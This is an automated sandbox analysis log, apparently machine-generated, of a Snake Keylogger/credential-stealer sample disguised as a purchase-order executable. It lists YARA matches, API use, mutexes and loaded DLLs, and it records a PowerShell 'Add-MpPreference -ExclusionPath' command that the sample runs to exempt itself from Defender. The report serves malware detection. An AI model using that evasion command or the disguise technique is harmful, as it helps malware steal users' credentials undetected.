Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053538B8	4_2_053538B8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E0B8	4_2_0535E0B8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535E0A7	4_2_0535E0A7
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350498	4_2_05350498
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05350489	4_2_05350489
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05356488	4_2_05356488
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053508F0	4_2_053508F0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053508E0	4_2_053508E0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053594E2	4_2_053594E2
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535C0C8	4_2_0535C0C8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05357720	4_2_05357720
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05355328	4_2_05355328
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05357710	4_2_05357710
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535B318	4_2_0535B318
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535B307	4_2_0535B307
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05352300	4_2_05352300
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535D308	4_2_0535D308
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535F778	4_2_0535F778
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05357B69	4_2_05357B69
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05352758	4_2_05352758
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05352749	4_2_05352749
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05352BB0	4_2_05352BB0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05352BA0	4_2_05352BA0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05358FA0	4_2_05358FA0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535B7A8	4_2_0535B7A8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535D798	4_2_0535D798
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535B798	4_2_0535B798
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535D787	4_2_0535D787
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05355780	4_2_05355780
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535F788	4_2_0535F788
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05355BD8	4_2_05355BD8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05354620	4_2_05354620
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05354622	4_2_05354622
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05356A18	4_2_05356A18
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05356E70	4_2_05356E70
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05356E72	4_2_05356E72
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05354A78	4_2_05354A78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535CE78	4_2_0535CE78
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535CE67	4_2_0535CE67
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535EE68	4_2_0535EE68
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535EE57	4_2_0535EE57
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05351A50	4_2_05351A50
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05351A41	4_2_05351A41
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053572B8	4_2_053572B8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05351EA8	4_2_05351EA8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05351E98	4_2_05351E98
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535D2F7	4_2_0535D2F7
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053522F0	4_2_053522F0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535F2F8	4_2_0535F2F8
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_0535F2E7	4_2_0535F2E7
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_05354ED0	4_2_05354ED0
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Code function: 4_2_053572C8	4_2_053572C8

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, B-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, B-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, B-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, B-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Oeqh8dDwUiwosl8xFO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/8@4/3

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Mutant created: \Sessions\1\BaseNamedObjects\DTjljdRoy
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxcxcazm.2v2.ps1

Jump to behavior

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

File read: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Process created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
